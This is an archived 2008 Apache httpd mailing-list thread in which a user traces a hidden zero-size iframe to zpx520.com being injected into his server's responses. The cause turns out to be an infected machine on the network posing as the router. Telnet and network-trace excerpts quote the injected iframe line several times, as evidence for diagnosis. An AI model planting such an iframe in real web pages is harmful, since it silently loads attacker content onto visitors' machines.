You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Greg Mortensen <th...@pobox.com> on 2008/06/18 19:33:50 UTC
[users@httpd] zpx520.com hidden iframe in stock Win32 install?
Hi, list.
I need a quick sanity check. I have a stock 2.2.9 httpd (Win32 Binary
including OpenSSL 0.9.8h (MSI Installer)) install on my Windows XP box. I
just got the binary from the veritris.com mirror. The MD5 signature
checks out fine.
Everything looked OK while connecting to localhost, but I noticed a funny
0x0 "blip" in the left-hand corner when viewing it remotely. I decided to
connect to it by hand, and I found a hidden iframe element that's not in
the index.html file:
$ telnet 192.168.8.150 80
Trying 192.168.8.150...
Connected to 192.168.8.150.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 264
Content-Type: text/html
<iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe>
<html><body><h1>It works!</h1></body></html>
I tried it on another XP machine, and I got the same result. Before I
try to narrow this down to httpd / my machines / myself, I'd like to ask
if anyone else has seen this? A virus and spyware scan came up OK on both
machines.
I haven't compiled this version from source yet, but I'm going to try
that next.
Regards,
Greg
\|/ ___ \|/ thevision@pobox.com +----- 2048R/38BD6CAB -----+
@~./'O o`\.~@ | 02BD EF81 91B3 1B33 64C2 |
/__( \___/ )__\ | 3247 6722 7006 38BD 6CAB |
`\__`U_/' +--------------------------+
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?
Posted by Greg Mortensen <th...@pobox.com>.
On Wed, 18 Jun 2008, Mark H. Wood wrote:
> http://www.threatexpert.com/report.aspx?uid=681ac5d0-36d8-4217-8e0f-38f5b928fb14
It turns out that another machine on the network had become infected
with "something" (we haven't determined with what, yet) and was
advertising itself as the local default router. The iframe problem went
away as soon as the machine was unplugged.
Regards,
Greg
\|/ ___ \|/ thevision@pobox.com +----- 2048R/38BD6CAB -----+
@~./'O o`\.~@ | 02BD EF81 91B3 1B33 64C2 |
/__( \___/ )__\ | 3247 6722 7006 38BD 6CAB |
`\__`U_/' +--------------------------+
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?
Posted by "Mark H. Wood" <mw...@IUPUI.Edu>.
A quick search turns up this page:
http://www.threatexpert.com/report.aspx?uid=681ac5d0-36d8-4217-8e0f-38f5b928fb14
--
Mark H. Wood, Lead System Programmer mwood@IUPUI.Edu
Typically when a software vendor says that a product is "intuitive" he
means the exact opposite.
Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?
Posted by Greg Mortensen <th...@pobox.com>.
On Wed, 18 Jun 2008, Issac Goldstand wrote:
> Doesn't sound right to me... I've certainly never noticed it on win32
> installs, though I don't have an environment to test it myself just now
I just tried 2.0.63 and the same thing happens. Using a handful of
sysinternal tools, I can see the following:
[1] The index.html is read (44 bytes).
[2] A network trace (running on the httpd server) shows that all of the
HTTP headers and the real index.html go out:
HTTP/1.1 200 OK
Date: Wed, 18 Jun 2008 19:28:31 GMT
Server: Apache/2.2.9 (Win32)
Last-Modified: Sat, 20 Nov 2004 18:16:24 GMT
ETag: "13000000004c24-2c-3e9549efc6e00"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
<html><body><h1>It works!</h1></body></html>
[3] A network trace (on the client) shows that the majority of the HTTP
headers are thrown away and the iframe element inserted:
HTTP: ----- HyperText Transfer Protocol -----
HTTP:
HTTP: HTTP/1.1 200 OK
HTTP: Content-Length: 265
HTTP: Content-Type: text/html
HTTP:
HTTP: <iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe>
<html><body><h1>It works!</h1></body></html>
HTTP:
"Something" between #2 and #3 is molesting the data. I haven't figured
out the "something" yet, but I noticed that this only happens on the server
running on port 80. I also noticed that disabling mod_mime causes the
data to go out properly.
Regards,
Greg
\|/ ___ \|/ thevision@pobox.com +----- 2048R/38BD6CAB -----+
@~./'O o`\.~@ | 02BD EF81 91B3 1B33 64C2 |
/__( \___/ )__\ | 3247 6722 7006 38BD 6CAB |
`\__`U_/' +--------------------------+
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?
Posted by Issac Goldstand <ma...@beamartyr.net>.
Greg Mortensen wrote:
> Hi, list.
>
> I need a quick sanity check. I have a stock 2.2.9 httpd (Win32 Binary
> including OpenSSL 0.9.8h (MSI Installer)) install on my Windows XP
> box. I just got the binary from the veritris.com mirror. The MD5
> signature checks out fine.
>
> Everything looked OK while connecting to localhost, but I noticed a
> funny 0x0 "blip" in the left-hand corner when viewing it remotely. I
> decided to connect to it by hand, and I found a hidden iframe element
> that's not in the index.html file:
>
> $ telnet 192.168.8.150 80
> Trying 192.168.8.150...
> Connected to 192.168.8.150.
> Escape character is '^]'.
> GET / HTTP/1.0
>
> HTTP/1.1 200 OK
> Content-Length: 264
> Content-Type: text/html
>
> <iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe>
> <html><body><h1>It works!</h1></body></html>
>
>
> I tried it on another XP machine, and I got the same result. Before
> I try to narrow this down to httpd / my machines / myself, I'd like to
> ask
> if anyone else has seen this? A virus and spyware scan came up OK on
> both machines.
>
Doesn't sound right to me... I've certainly never noticed it on win32
installs, though I don't have an environment to test it myself just now
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org